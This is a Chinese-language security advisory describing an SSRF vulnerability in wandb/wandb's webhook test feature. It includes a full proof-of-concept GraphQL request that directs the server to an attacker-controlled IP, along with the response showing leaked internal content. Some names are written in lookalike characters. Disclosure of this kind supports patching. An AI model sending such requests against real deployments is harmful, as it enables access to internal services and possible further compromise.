漏洞描述:
由于HTTP302重定向处理不当,ԝаndb/ԝаndb存储库中存在服务端请求伪造(SSRF)漏洞,此问题允许有权访问'Uѕеr ѕеttinɡѕ->Wеbhооkѕ'函数的团队成员利用该漏洞访问内部HTTP(ѕ)服务器,在严重的情况下,例如在AWS实例上,这可能会被滥用以在受害者的机器上实现远程代码执行,该漏洞存在于最新版本的存储库中。
POST /graphql HTTP/1.1
Host: ip:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer: http://ip:8080/settings
content-type: application/json
X-Origin: http://ip:8080
Content-Length: 572
Origin: http://ip:8080
Connection: close
{"operationName":"TestGenericWebhookIntegration","variables":{"entityName":"test","urlEndpoint":"http://{your-IP}:4444","requestPayload":"{\n\n\n\n\n}"},"query":"mutation TestGenericWebhookIntegration($entityName: String!, $urlEndpoint: String!, $accessTokenRef: String, $secretRef: String, $requestPayload: JSONString) {\n testGenericWebhookIntegration(\n input: {entityName: $entityName, urlEndpoint: $urlEndpoint, accessTokenRef: $accessTokenRef, secretRef: $secretRef, requestPayload: $requestPayload}\n ) {\n ok\n response\n __typename\n }\n}\n"}
HTTP/1.1 200 OK
Server: nginx
Date: Mon, 18 Mar 2024 14:48:04 GMT
Content-Type: application/json; charset=utf-8
Content-Length: 201
Connection: close
Vary: Origin
X-Content-Type-Options: nosniff
X-Ratelimit-Limit: 1000
X-Ratelimit-Remaining: 1000
Cache-Control: no-store, no-cache, must-revalidate, proxy-revalidate, max-age=0
{"data":{"testGenericWebhookIntegration":{"ok":true,"response":"{\"response\":\"\\u003ch1\\u003eSSRF secret\\u003c/h1\\u003e\\n\",\"error\":\"\"}","__typename":"TestGenericWebhookIntegrationPayload"}}}
影响产品:
wandb/wandb<=latest
修复解决方案:
目前官方已有可更新版本,建议受影响用户升级至最新版本